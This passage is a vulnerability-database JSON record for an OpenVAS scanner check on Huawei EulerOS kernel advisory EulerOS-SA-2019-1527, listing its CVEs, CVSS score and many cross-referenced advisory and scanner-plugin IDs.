DATABASE RESOURCES PRICING ABOUT US

{"id": "OPENVAS:1361412562311220191527", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1527)", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "published": "2020-01-23T00:00:00", "modified": "2020-02-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191527", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["2019-1527", "https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1527"], "cvelist": ["CVE-2015-8787", "CVE-2014-0131", "CVE-2016-4794", "CVE-2017-6074", "CVE-2014-8134", "CVE-2016-2069", "CVE-2015-5364", "CVE-2014-9410", "CVE-2017-18203", "CVE-2014-9940", "CVE-2014-1874", "CVE-2014-3181", "CVE-2015-8812", "CVE-2017-12192", "CVE-2016-0728", "CVE-2015-5327", "CVE-2016-10318", "CVE-2017-18344", "CVE-2014-9428", "CVE-2013-4470"], "immutableFields": [], "lastseen": "2020-02-05T16:38:58", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "altlinux", "idList": ["0A73C01D4DA08B819B9C4B612AFC80EC"]}, {"type": "amazon", "idList": ["ALAS-2013-252", "ALAS-2014-289", "ALAS-2015-565", "ALAS-2015-603", "ALAS-2016-642", "ALAS-2017-805", "ALAS-2017-914"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-0728", "ANDROID:CVE-2016-4794"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-03-01", "ANDROID:2016-09-01", "ANDROID:2016-12-01", "ANDROID:2017-05-01", "ANDROID:2017-07-01"]}, {"type": "archlinux", "idList": ["ASA-201601-20", "ASA-201601-26", "ASA-201702-17", "ASA-201702-18"]}, {"type": "canvas", "idList": ["SHOW_TIMER_LEAK"]}, {"type": "centos", "idList": ["CESA-2013:1801", "CESA-2014:0771", "CESA-2014:1971", "CESA-2015:1623", "CESA-2015:1778", "CESA-2016:0045", "CESA-2016:0064", "CESA-2016:0855", "CESA-2016:2574", "CESA-2017:0293", "CESA-2017:0294", "CESA-2017:0323", "CESA-2017:0817", "CESA-2018:0151", "CESA-2018:1062", "CESA-2018:1854", "CESA-2018:3083", "CESA-2020:2430"]}, {"type": "checkpoint_security", "idList": ["CPS:SK109752"]}, {"type": "chrome", "idList": ["GCSA-4592147546557278119"]}, {"type": "cisa", "idList": ["CISA:FCB4B9C4CB605F6B805399E8D3B54A48"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "CFOUNDRY:539F990C3DAAC021E491E8629DA539FE", "CFOUNDRY:59BA3F002F833C86F9D716E2A3575DCB", "CFOUNDRY:897C3471765453EA05465A73CDC16BBB", "CFOUNDRY:E36E8558D6E84664F9D34B4A9E5179AC"]}, {"type": "cloudlinux", "idList": ["CLSA-2022:1650576075"]}, {"type": "cve", "idList": ["CVE-2003-1604", "CVE-2013-4470", "CVE-2014-0131", "CVE-2014-1874", "CVE-2014-3181", "CVE-2014-8134", "CVE-2014-9410", "CVE-2014-9428", "CVE-2014-9940", "CVE-2015-5327", "CVE-2015-5364", "CVE-2015-5366", "CVE-2015-8787", "CVE-2015-8812", "CVE-2016-0728", "CVE-2016-10318", "CVE-2016-2069", "CVE-2016-4794", "CVE-2016-7028", "CVE-2017-12192", "CVE-2017-15274", "CVE-2017-18203", "CVE-2017-18344", "CVE-2017-6074"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1369-1:33F82", "DEBIAN:DLA-155-1:5E8B0", "DEBIAN:DLA-310-1:EAC5D", "DEBIAN:DLA-412-1:99076", "DEBIAN:DLA-439-1:BED7A", "DEBIAN:DLA-833-1:91DAA", "DEBIAN:DSA-2906-1:5B9FC", "DEBIAN:DSA-3313-1:00F99", "DEBIAN:DSA-3313-1:C4641", "DEBIAN:DSA-3329-1:6C2DD", "DEBIAN:DSA-3329-1:93E26", "DEBIAN:DSA-3448-1:04492", "DEBIAN:DSA-3448-1:C7742", "DEBIAN:DSA-3503-1:23448", "DEBIAN:DSA-3503-1:9DDFA", "DEBIAN:DSA-3791-1:0D4D5", "DEBIAN:DSA-3791-1:AE0FD", "DEBIAN:DSA-3945-1:532A6", "DEBIAN:DSA-3945-1:A4CC7", "DEBIAN:DSA-4187-1:481CA", "DEBIAN:DSA-4187-1:E8170"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2003-1604", "DEBIANCVE:CVE-2013-4470", "DEBIANCVE:CVE-2014-0131", "DEBIANCVE:CVE-2014-1874", "DEBIANCVE:CVE-2014-3181", "DEBIANCVE:CVE-2014-8134", "DEBIANCVE:CVE-2014-9428", "DEBIANCVE:CVE-2014-9940", "DEBIANCVE:CVE-2015-5327", "DEBIANCVE:CVE-2015-5364", "DEBIANCVE:CVE-2015-5366", "DEBIANCVE:CVE-2015-8787", "DEBIANCVE:CVE-2015-8812", "DEBIANCVE:CVE-2016-0728", "DEBIANCVE:CVE-2016-10318", "DEBIANCVE:CVE-2016-2069", "DEBIANCVE:CVE-2016-4794", "DEBIANCVE:CVE-2017-12192", "DEBIANCVE:CVE-2017-15274", "DEBIANCVE:CVE-2017-18203", "DEBIANCVE:CVE-2017-18344", "DEBIANCVE:CVE-2017-6074"]}, {"type": "exploitdb", "idList": ["EDB-ID:39277", "EDB-ID:40003", "EDB-ID:41458", "EDB-ID:45175"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F", "EXPLOITPACK:4EEB4BE9E101A3B6E5FA4A3FC9B06CCD", "EXPLOITPACK:84D4B1F42D5DCA9623080EFFD17E58E1", "EXPLOITPACK:CC3E0CE0239066A83BA64B22929DBCEC"]}, {"type": "f5", "idList": ["F5:K01948202", "F5:K07020416", "F5:K10164113", "F5:K15699", "F5:K17120", "F5:K17307", "F5:K17309", "F5:K33567812", "F5:K41101201", "F5:K44500413", "F5:K80758444", "F5:K82508682", "SOL01948202", "SOL10164113", "SOL15699", "SOL17120", "SOL17121", "SOL17307", "SOL17309", "SOL80758444"]}, {"type": "fedora", "idList": ["FEDORA:02EB96052912", "FEDORA:0777460874C8", "FEDORA:0960721640", "FEDORA:0D267606CFB3", "FEDORA:0D8242218A", "FEDORA:131186087E1C", "FEDORA:1317A20FE4", "FEDORA:1661D600FD84", "FEDORA:1835E22100", "FEDORA:18E4222173", "FEDORA:1AE8521943", "FEDORA:1CCC322073", "FEDORA:1DA3D221C6", "FEDORA:1F466601E823", "FEDORA:23B6E225A0", "FEDORA:2417521BFF", "FEDORA:26C5127E25", "FEDORA:26DF321BA7", "FEDORA:2784A21C29", "FEDORA:280D922723", "FEDORA:28A7021A1E", "FEDORA:2A0322BA2C", "FEDORA:2BA602158D", "FEDORA:2EEE52123F", "FEDORA:2F13360877A3", "FEDORA:3060D60E9A21", "FEDORA:30991220A7", "FEDORA:30C5820E79", "FEDORA:33D8860877E1", "FEDORA:3595F21BB4", "FEDORA:39B5660877A6", "FEDORA:4359160906D1", "FEDORA:4375D611D164", "FEDORA:453986087A76", "FEDORA:4A2C76087582", "FEDORA:4F15F6087C54", "FEDORA:51EB2601616F", "FEDORA:56A5821917", "FEDORA:57F742243A", "FEDORA:60B8C60918D5", "FEDORA:6437E61257FA", "FEDORA:67FB6618BD69", "FEDORA:6800622747", "FEDORA:6A93C20D15", "FEDORA:756F822091", "FEDORA:7734E613B647", "FEDORA:84C4E22D8F", "FEDORA:8BF45213A1", "FEDORA:8C61D2154D", "FEDORA:8E01360DC908", "FEDORA:8EFBC604949F", "FEDORA:92F5160877B4", "FEDORA:9330A21FE6", "FEDORA:936A4223EA", "FEDORA:9FA6021249", "FEDORA:A4C8660C350E", "FEDORA:A5C89601FC0F", "FEDORA:AE219254B2", "FEDORA:B72CD214AC", "FEDORA:B7EB96087DBD", "FEDORA:B81A721D1C", "FEDORA:B9C4760130DC", "FEDORA:B9F6A606511F", "FEDORA:BD41660BC2B1", "FEDORA:C26F460906BA", "FEDORA:C35B860CD859", "FEDORA:C56CF6087715", "FEDORA:CE3236087E07", "FEDORA:CFDB8604972F", "FEDORA:D0CC960762B3", "FEDORA:D15E060F33C2", "FEDORA:D69CC24B48", "FEDORA:DA71D21D19", "FEDORA:DB49F219DE", "FEDORA:DE40F21338", "FEDORA:E1CE2605E17A", "FEDORA:E6C59213CA", "FEDORA:E7CE72245B", "FEDORA:E99C02072E", "FEDORA:F015721408"]}, {"type": "hackerone", "idList": ["H1:347282"]}, {"type": "hp", "idList": ["HP:C05018265"]}, {"type": "ibm", "idList": ["0C9BE2F3A245999460BB6BC497E21EC27992E79FB4C1D769E6D1CF729AB33300", "2ABC4CD376C07922A3144CF8116D979F4BDDE16EED9AADA11262FBF58C851DBF", "3EB2D1CBDE6F39F65F1D781A1439298F76DA3A8C8C722E723825134FB37DDB9E", "50D485C935533CE40EA67F7999EFEC0CD0087E4C2E7926EFF7DCB22671BD3052", "61EAA34D5E4645B71F124164E8135272DB3119CF3ABDC2864377B692FCF87527", "658C6A388449448220E16F3A05A122A56F35F4A9A9370C4B63DC0779B971B6CE", "6F75059EBDF719D84C8DC0CA4BAADF9428544BDAFCEEAE62F4225A55CA1E8AF0", "72A14F3E1A05E87987247C3A94DA37A971910E734C842EA2FD4E32CE8B24FCF5", "A0B51C5217767E75AB974BA93584FB1F969514BA8D7EE9EDD025C20F274C1D2F", "A3ECA2FADF3E248DCF026E08D24250DA5644166428EA8CC2D77F20F0FD2FCE99", "AF6E3EC9D5A5C3CF688EF87142347E0688A4AE1CB6831F92326966B86BF2D9C1", "B7EDA2450D13E204B60C3A3E7379E6FCCD587CB32FEB5041ADDA6CB8E3C44FC3", "CD9B5BF488F3327F1A5D08B8A25E9EF90D7304376F44A16FB3F05E06566E80FF", "F092FBBD34304315E258962CA397F72D24D88CD673A181734FDCE39754098484"]}, {"type": "kitploit", "idList": ["KITPLOIT:4462385753504235463"]}, {"type": "lenovo", "idList": ["LENOVO:PS500107-NOSID", "LENOVO:PS500321-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2013-0342", "MGASA-2013-0343", "MGASA-2013-0344", "MGASA-2013-0345", "MGASA-2013-0346", "MGASA-2013-0371", "MGASA-2013-0372", "MGASA-2013-0373", "MGASA-2013-0374", "MGASA-2013-0375", "MGASA-2015-0006", "MGASA-2015-0070", "MGASA-2015-0075", "MGASA-2015-0076", "MGASA-2015-0077", "MGASA-2015-0078", "MGASA-2016-0031", "MGASA-2016-0032", "MGASA-2016-0033", "MGASA-2016-0225", "MGASA-2016-0232", "MGASA-2016-0233", "MGASA-2016-0271", "MGASA-2016-0283", "MGASA-2016-0284", "MGASA-2017-0063", "MGASA-2017-0064", "MGASA-2017-0065", "MGASA-2018-0062", "MGASA-2018-0063", "MGASA-2018-0064"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783679", "MYHACK58:62201783692"]}, {"type": "nessus", "idList": ["ALA_ALAS-2013-252.NASL", "ALA_ALAS-2014-289.NASL", "ALA_ALAS-2015-565.NASL", "ALA_ALAS-2015-603.NASL", "ALA_ALAS-2016-642.NASL", "ALA_ALAS-2017-805.NASL", "ALA_ALAS-2017-914.NASL", "CENTOS_RHSA-2013-1801.NASL", "CENTOS_RHSA-2014-0771.NASL", "CENTOS_RHSA-2014-1971.NASL", "CENTOS_RHSA-2015-1623.NASL", "CENTOS_RHSA-2015-1778.NASL", "CENTOS_RHSA-2016-0045.NASL", "CENTOS_RHSA-2016-0064.NASL", "CENTOS_RHSA-2016-0855.NASL", "CENTOS_RHSA-2016-2574.NASL", "CENTOS_RHSA-2017-0293.NASL", "CENTOS_RHSA-2017-0294.NASL", "CENTOS_RHSA-2017-0323.NASL", "CENTOS_RHSA-2017-0817.NASL", "CENTOS_RHSA-2018-0151.NASL", "CENTOS_RHSA-2018-1062.NASL", "CENTOS_RHSA-2018-1854.NASL", "CENTOS_RHSA-2018-3083.NASL", "CENTOS_RHSA-2020-2430.NASL", "DEBIAN_DLA-1369.NASL", "DEBIAN_DLA-155.NASL", "DEBIAN_DLA-310.NASL", "DEBIAN_DLA-412.NASL", "DEBIAN_DLA-439.NASL", "DEBIAN_DLA-833.NASL", "DEBIAN_DSA-2906.NASL", "DEBIAN_DSA-3313.NASL", "DEBIAN_DSA-3329.NASL", "DEBIAN_DSA-3448.NASL", "DEBIAN_DSA-3503.NASL", "DEBIAN_DSA-3791.NASL", "DEBIAN_DSA-3945.NASL", "DEBIAN_DSA-4187.NASL", "EULEROS_SA-2016-1020.NASL", "EULEROS_SA-2017-1056.NASL", "EULEROS_SA-2017-1057.NASL", "EULEROS_SA-2017-1122.NASL", "EULEROS_SA-2017-1123.NASL", "EULEROS_SA-2017-1271.NASL", "EULEROS_SA-2017-1292.NASL", "EULEROS_SA-2018-1054.NASL", "EULEROS_SA-2018-1133.NASL", "EULEROS_SA-2018-1246.NASL", "EULEROS_SA-2018-1360.NASL", "EULEROS_SA-2018-1369.NASL", "EULEROS_SA-2018-1406.NASL", "EULEROS_SA-2019-1475.NASL", "EULEROS_SA-2019-1477.NASL", "EULEROS_SA-2019-1479.NASL", "EULEROS_SA-2019-1480.NASL", "EULEROS_SA-2019-1485.NASL", "EULEROS_SA-2019-1488.NASL", "EULEROS_SA-2019-1489.NASL", "EULEROS_SA-2019-1491.NASL", "EULEROS_SA-2019-1494.NASL", "EULEROS_SA-2019-1499.NASL", "EULEROS_SA-2019-1501.NASL", "EULEROS_SA-2019-1502.NASL", "EULEROS_SA-2019-1527.NASL", "F5_BIGIP_SOL07020416.NASL", "F5_BIGIP_SOL15699.NASL", "F5_BIGIP_SOL17307.NASL", "F5_BIGIP_SOL17309.NASL", "F5_BIGIP_SOL82508682.NASL", "FEDORA_2013-20547.NASL", "FEDORA_2013-20705.NASL", "FEDORA_2013-20748.NASL", "FEDORA_2014-11008.NASL", "FEDORA_2014-11031.NASL", "FEDORA_2014-11097.NASL", "FEDORA_2014-17244.NASL", "FEDORA_2014-17283.NASL", "FEDORA_2014-17293.NASL", "FEDORA_2014-2576.NASL", "FEDORA_2014-4317.NASL", "FEDORA_2014-4360.NASL", "FEDORA_2015-0515.NASL", "FEDORA_2015-0517.NASL", "FEDORA_2016-2F25D12C51.NASL", "FEDORA_2016-5D43766E33.NASL", "FEDORA_2016-7E12AE5359.NASL", "FEDORA_2016-9FBE2C258B.NASL", "FEDORA_2016-B59FD603BE.NASL", "FEDORA_2016-E7162262B0.NASL", "FEDORA_2017-4B9F61C68D.NASL", "FEDORA_2017-F519EBB3C4.NASL", "MANDRIVA_MDVSA-2013-265.NASL", "MANDRIVA_MDVSA-2014-124.NASL", "MANDRIVA_MDVSA-2014-155.NASL", "MANDRIVA_MDVSA-2014-201.NASL", "MANDRIVA_MDVSA-2015-058.NASL", "NEWSTART_CGSL_NS-SA-2019-0004_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0014_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0044_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0049_KERNEL-RT.NASL", "NEWSTART_CGSL_NS-SA-2019-0070_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0074_KERNEL-RT.NASL", "NEWSTART_CGSL_NS-SA-2019-0113_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0152_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2022-0001_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2022-0075_KERNEL.NASL", "OPENSUSE-2014-375.NASL", "OPENSUSE-2014-376.NASL", "OPENSUSE-2014-478.NASL", "OPENSUSE-2014-493.NASL", "OPENSUSE-2014-791.NASL", "OPENSUSE-2014-793.NASL", "OPENSUSE-2015-301.NASL", "OPENSUSE-2015-302.NASL", "OPENSUSE-2015-543.NASL", "OPENSUSE-2016-1015.NASL", "OPENSUSE-2016-1076.NASL", "OPENSUSE-2016-116.NASL", "OPENSUSE-2016-124.NASL", "OPENSUSE-2016-136.NASL", "OPENSUSE-2016-1410.NASL", "OPENSUSE-2016-256.NASL", "OPENSUSE-2016-445.NASL", "OPENSUSE-2016-518.NASL", "OPENSUSE-2016-869.NASL", "OPENSUSE-2017-286.NASL", "OPENSUSE-2017-287.NASL", "OPENSUSE-2017-562.NASL", "OPENSUSE-2018-826.NASL", "OPENSUSE-2018-885.NASL", "OPENSUSE-2019-597.NASL", "ORACLELINUX_ELSA-2013-1801.NASL", "ORACLELINUX_ELSA-2013-2587.NASL", "ORACLELINUX_ELSA-2013-2588.NASL", "ORACLELINUX_ELSA-2013-2589.NASL", "ORACLELINUX_ELSA-2014-0771.NASL", "ORACLELINUX_ELSA-2014-1971.NASL", "ORACLELINUX_ELSA-2014-3002.NASL", "ORACLELINUX_ELSA-2014-3042.NASL", "ORACLELINUX_ELSA-2014-3043.NASL", "ORACLELINUX_ELSA-2014-3084.NASL", "ORACLELINUX_ELSA-2014-3085.NASL", "ORACLELINUX_ELSA-2014-3086.NASL", "ORACLELINUX_ELSA-2014-3096.NASL", "ORACLELINUX_ELSA-2014-3104.NASL", "ORACLELINUX_ELSA-2015-0290.NASL", "ORACLELINUX_ELSA-2015-1623.NASL", "ORACLELINUX_ELSA-2015-1778.NASL", "ORACLELINUX_ELSA-2015-3012.NASL", "ORACLELINUX_ELSA-2015-3071.NASL", "ORACLELINUX_ELSA-2015-3072.NASL", "ORACLELINUX_ELSA-2015-3073.NASL", "ORACLELINUX_ELSA-2015-3098.NASL", "ORACLELINUX_ELSA-2016-0045.NASL", "ORACLELINUX_ELSA-2016-0064.NASL", "ORACLELINUX_ELSA-2016-0855.NASL", "ORACLELINUX_ELSA-2016-2574.NASL", "ORACLELINUX_ELSA-2016-3509.NASL", "ORACLELINUX_ELSA-2016-3510.NASL", "ORACLELINUX_ELSA-2016-3596.NASL", "ORACLELINUX_ELSA-2016-3644.NASL", "ORACLELINUX_ELSA-2017-0293.NASL", "ORACLELINUX_ELSA-2017-0294.NASL", "ORACLELINUX_ELSA-2017-0323.NASL", "ORACLELINUX_ELSA-2017-0817.NASL", "ORACLELINUX_ELSA-2017-1842-1.NASL", "ORACLELINUX_ELSA-2017-3520.NASL", "ORACLELINUX_ELSA-2017-3521.NASL", "ORACLELINUX_ELSA-2017-3522.NASL", "ORACLELINUX_ELSA-2017-3534.NASL", "ORACLELINUX_ELSA-2017-3567.NASL", "ORACLELINUX_ELSA-2017-3640.NASL", "ORACLELINUX_ELSA-2017-3651.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLELINUX_ELSA-2018-0151.NASL", "ORACLELINUX_ELSA-2018-1062.NASL", "ORACLELINUX_ELSA-2018-1854.NASL", "ORACLELINUX_ELSA-2018-3083.NASL", "ORACLELINUX_ELSA-2018-4071.NASL", "ORACLELINUX_ELSA-2018-4114.NASL", "ORACLELINUX_ELSA-2018-4164.NASL", "ORACLELINUX_ELSA-2018-4196.NASL", "ORACLELINUX_ELSA-2018-4211.NASL", "ORACLELINUX_ELSA-2018-4214.NASL", "ORACLELINUX_ELSA-2019-4642.NASL", "ORACLELINUX_ELSA-2019-4742.NASL", "ORACLELINUX_ELSA-2020-2430.NASL", "ORACLELINUX_ELSA-2021-9486.NASL", "ORACLELINUX_ELSA-2021-9487.NASL", "ORACLEVM_OVMSA-2015-0040.NASL", "ORACLEVM_OVMSA-2015-0114.NASL", "ORACLEVM_OVMSA-2015-0147.NASL", "ORACLEVM_OVMSA-2016-0005.NASL", "ORACLEVM_OVMSA-2016-0037.NASL", "ORACLEVM_OVMSA-2016-0100.NASL", "ORACLEVM_OVMSA-2016-0162.NASL", "ORACLEVM_OVMSA-2017-0044.NASL", "ORACLEVM_OVMSA-2017-0045.NASL", "ORACLEVM_OVMSA-2017-0046.NASL", "ORACLEVM_OVMSA-2017-0057.NASL", "ORACLEVM_OVMSA-2017-0106.NASL", "ORACLEVM_OVMSA-2017-0169.NASL", "ORACLEVM_OVMSA-2017-0172.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2018-0035.NASL", "ORACLEVM_OVMSA-2018-0223.NASL", "ORACLEVM_OVMSA-2018-0237.NASL", "ORACLEVM_OVMSA-2018-0247.NASL", "ORACLEVM_OVMSA-2019-0022.NASL", "PHOTONOS_PHSA-2017-0006.NASL", "PHOTONOS_PHSA-2017-0006_LINUX.NASL", "RANCHEROS_0_8_1.NASL", "RANCHEROS_1_1_1.NASL", "REDHAT-RHSA-2013-1801.NASL", "REDHAT-RHSA-2013-1802.NASL", "REDHAT-RHSA-2014-0100.NASL", "REDHAT-RHSA-2014-0284.NASL", "REDHAT-RHSA-2014-0439.NASL", "REDHAT-RHSA-2014-0771.NASL", "REDHAT-RHSA-2014-0815.NASL", "REDHAT-RHSA-2014-1318.NASL", "REDHAT-RHSA-2014-1971.NASL", "REDHAT-RHSA-2015-1623.NASL", "REDHAT-RHSA-2015-1778.NASL", "REDHAT-RHSA-2015-1787.NASL", "REDHAT-RHSA-2015-1788.NASL", "REDHAT-RHSA-2016-0045.NASL", "REDHAT-RHSA-2016-0064.NASL", "REDHAT-RHSA-2016-0065.NASL", "REDHAT-RHSA-2016-0068.NASL", "REDHAT-RHSA-2016-0103.NASL", "REDHAT-RHSA-2016-0855.NASL", "REDHAT-RHSA-2016-1096.NASL", "REDHAT-RHSA-2016-1100.NASL", "REDHAT-RHSA-2016-1225.NASL", "REDHAT-RHSA-2016-2574.NASL", "REDHAT-RHSA-2016-2584.NASL", "REDHAT-RHSA-2017-0293.NASL", "REDHAT-RHSA-2017-0294.NASL", "REDHAT-RHSA-2017-0295.NASL", "REDHAT-RHSA-2017-0316.NASL", "REDHAT-RHSA-2017-0323.NASL", "REDHAT-RHSA-2017-0324.NASL", "REDHAT-RHSA-2017-0345.NASL", "REDHAT-RHSA-2017-0346.NASL", "REDHAT-RHSA-2017-0347.NASL", "REDHAT-RHSA-2017-0365.NASL", "REDHAT-RHSA-2017-0366.NASL", "REDHAT-RHSA-2017-0403.NASL", "REDHAT-RHSA-2017-0501.NASL", "REDHAT-RHSA-2017-0817.NASL", "REDHAT-RHSA-2017-0932.NASL", "REDHAT-RHSA-2017-1209.NASL", "REDHAT-RHSA-2018-0151.NASL", "REDHAT-RHSA-2018-0152.NASL", "REDHAT-RHSA-2018-0181.NASL", "REDHAT-RHSA-2018-0654.NASL", "REDHAT-RHSA-2018-0676.NASL", "REDHAT-RHSA-2018-1062.NASL", "REDHAT-RHSA-2018-1854.NASL", "REDHAT-RHSA-2018-2948.NASL", "REDHAT-RHSA-2018-3083.NASL", "REDHAT-RHSA-2018-3096.NASL", "REDHAT-RHSA-2018-3459.NASL", "REDHAT-RHSA-2018-3540.NASL", "REDHAT-RHSA-2018-3586.NASL", "REDHAT-RHSA-2018-3590.NASL", "REDHAT-RHSA-2018-3591.NASL", "REDHAT-RHSA-2019-4154.NASL", "REDHAT-RHSA-2020-2430.NASL", "SL_20131212_KERNEL_ON_SL6_X.NASL", "SL_20140619_KERNEL_ON_SL6_X.NASL", "SL_20141209_KERNEL_ON_SL7_X.NASL", "SL_20150813_KERNEL_ON_SL6_X.NASL", "SL_20150915_KERNEL_ON_SL7_X.NASL", "SL_20160119_KERNEL_ON_SL5_X.NASL", "SL_20160125_KERNEL_ON_SL7_X.NASL", "SL_20160510_KERNEL_ON_SL6_X.NASL", "SL_20161103_KERNEL_ON_SL7_X.NASL", "SL_20170222_KERNEL_ON_SL6_X.NASL", "SL_20170222_KERNEL_ON_SL7_X.NASL", "SL_20170224_KERNEL_ON_SL5_X.NASL", "SL_20170321_KERNEL_ON_SL6_X.NASL", "SL_20180125_KERNEL_ON_SL7_X.NASL", "SL_20180410_KERNEL_ON_SL7_X.NASL", "SL_20180619_KERNEL_ON_SL6_X.NASL", "SL_20181030_KERNEL_ON_SL7_X.NASL", "SL_20200610_KERNEL_ON_SL6_X.NASL", "SUSE_11_KERNEL-140321.NASL", "SUSE_11_KERNEL-140408.NASL", "SUSE_11_KERNEL-140709.NASL", "SUSE_11_KERNEL-141202.NASL", "SUSE_11_KERNEL-141217.NASL", "SUSE_11_KERNEL-150306.NASL", "SUSE_SU-2014-0287-1.NASL", "SUSE_SU-2014-0536-1.NASL", "SUSE_SU-2014-0832-1.NASL", "SUSE_SU-2015-0481-1.NASL", "SUSE_SU-2015-0812-1.NASL", "SUSE_SU-2015-1324-1.NASL", "SUSE_SU-2015-1478-1.NASL", "SUSE_SU-2015-1611-1.NASL", "SUSE_SU-2015-1678-1.NASL", "SUSE_SU-2016-0186-1.NASL", "SUSE_SU-2016-0205-1.NASL", "SUSE_SU-2016-0585-1.NASL", "SUSE_SU-2016-0785-1.NASL", "SUSE_SU-2016-0911-1.NASL", "SUSE_SU-2016-1019-1.NASL", "SUSE_SU-2016-1203-1.NASL", "SUSE_SU-2016-2074-1.NASL", "SUSE_SU-2017-1183-1.NASL", "SUSE_SU-2017-1247-1.NASL", "SUSE_SU-2017-1301-1.NASL", "SUSE_SU-2017-1360-1.NASL", "SUSE_SU-2017-2525-1.NASL", "SUSE_SU-2017-2908-1.NASL", "SUSE_SU-2017-2920-1.NASL", "SUSE_SU-2017-3265-1.NASL", "SUSE_SU-2018-0040-1.NASL", "SUSE_SU-2018-1080-1.NASL", "SUSE_SU-2018-1172-1.NASL", "SUSE_SU-2018-1220-1.NASL", "SUSE_SU-2018-1221-1.NASL", "SUSE_SU-2018-2223-1.NASL", "SUSE_SU-2018-2328-1.NASL", "SUSE_SU-2018-2344-1.NASL", "SUSE_SU-2018-2344-2.NASL", "SUSE_SU-2018-2374-1.NASL", "SUSE_SU-2018-2387-1.NASL", "SUSE_SU-2018-2391-1.NASL", "SUSE_SU-2018-2416-1.NASL", "UBUNTU_USN-2040-1.NASL", "UBUNTU_USN-2042-1.NASL", "UBUNTU_USN-2043-1.NASL", "UBUNTU_USN-2049-1.NASL", "UBUNTU_USN-2066-1.NASL", "UBUNTU_USN-2069-1.NASL", "UBUNTU_USN-2073-1.NASL", "UBUNTU_USN-2128-1.NASL", "UBUNTU_USN-2129-1.NASL", "UBUNTU_USN-2133-1.NASL", "UBUNTU_USN-2135-1.NASL", "UBUNTU_USN-2136-1.NASL", "UBUNTU_USN-2137-1.NASL", "UBUNTU_USN-2138-1.NASL", "UBUNTU_USN-2140-1.NASL", "UBUNTU_USN-2233-1.NASL", "UBUNTU_USN-2234-1.NASL", "UBUNTU_USN-2283-1.NASL", "UBUNTU_USN-2285-1.NASL", "UBUNTU_USN-2286-1.NASL", "UBUNTU_USN-2287-1.NASL", "UBUNTU_USN-2289-1.NASL", "UBUNTU_USN-2376-1.NASL", "UBUNTU_USN-2378-1.NASL", "UBUNTU_USN-2379-1.NASL", "UBUNTU_USN-2441-1.NASL", "UBUNTU_USN-2442-1.NASL", "UBUNTU_USN-2443-1.NASL", "UBUNTU_USN-2445-1.NASL", "UBUNTU_USN-2446-1.NASL", "UBUNTU_USN-2447-1.NASL", "UBUNTU_USN-2447-2.NASL", "UBUNTU_USN-2448-1.NASL", "UBUNTU_USN-2448-2.NASL", "UBUNTU_USN-2515-1.NASL", "UBUNTU_USN-2515-2.NASL", "UBUNTU_USN-2516-1.NASL", "UBUNTU_USN-2516-2.NASL", "UBUNTU_USN-2516-3.NASL", "UBUNTU_USN-2517-1.NASL", "UBUNTU_USN-2518-1.NASL", "UBUNTU_USN-2680-1.NASL", "UBUNTU_USN-2681-1.NASL", "UBUNTU_USN-2682-1.NASL", "UBUNTU_USN-2683-1.NASL", "UBUNTU_USN-2684-1.NASL", "UBUNTU_USN-2685-1.NASL", "UBUNTU_USN-2713-1.NASL", "UBUNTU_USN-2870-1.NASL", "UBUNTU_USN-2870-2.NASL", "UBUNTU_USN-2871-1.NASL", "UBUNTU_USN-2871-2.NASL", "UBUNTU_USN-2872-1.NASL", "UBUNTU_USN-2872-2.NASL", "UBUNTU_USN-2872-3.NASL", "UBUNTU_USN-2873-1.NASL", "UBUNTU_USN-2889-1.NASL", "UBUNTU_USN-2889-2.NASL", "UBUNTU_USN-2890-1.NASL", "UBUNTU_USN-2890-2.NASL", "UBUNTU_USN-2890-3.NASL", "UBUNTU_USN-2908-1.NASL", "UBUNTU_USN-2908-2.NASL", "UBUNTU_USN-2908-3.NASL", "UBUNTU_USN-2908-4.NASL", "UBUNTU_USN-2908-5.NASL", "UBUNTU_USN-2931-1.NASL", "UBUNTU_USN-2932-1.NASL", "UBUNTU_USN-2946-1.NASL", "UBUNTU_USN-2946-2.NASL", "UBUNTU_USN-2947-1.NASL", "UBUNTU_USN-2947-2.NASL", "UBUNTU_USN-2947-3.NASL", "UBUNTU_USN-2948-1.NASL", "UBUNTU_USN-2948-2.NASL", "UBUNTU_USN-2949-1.NASL", "UBUNTU_USN-2967-1.NASL", "UBUNTU_USN-2989-1.NASL", "UBUNTU_USN-2998-1.NASL", "UBUNTU_USN-3053-1.NASL", "UBUNTU_USN-3054-1.NASL", "UBUNTU_USN-3055-1.NASL", "UBUNTU_USN-3056-1.NASL", "UBUNTU_USN-3057-1.NASL", "UBUNTU_USN-3206-1.NASL", "UBUNTU_USN-3207-1.NASL", "UBUNTU_USN-3207-2.NASL", "UBUNTU_USN-3208-1.NASL", "UBUNTU_USN-3208-2.NASL", "UBUNTU_USN-3209-1.NASL", "UBUNTU_USN-3335-1.NASL", "UBUNTU_USN-3343-1.NASL", "UBUNTU_USN-3343-2.NASL", "UBUNTU_USN-3469-1.NASL", 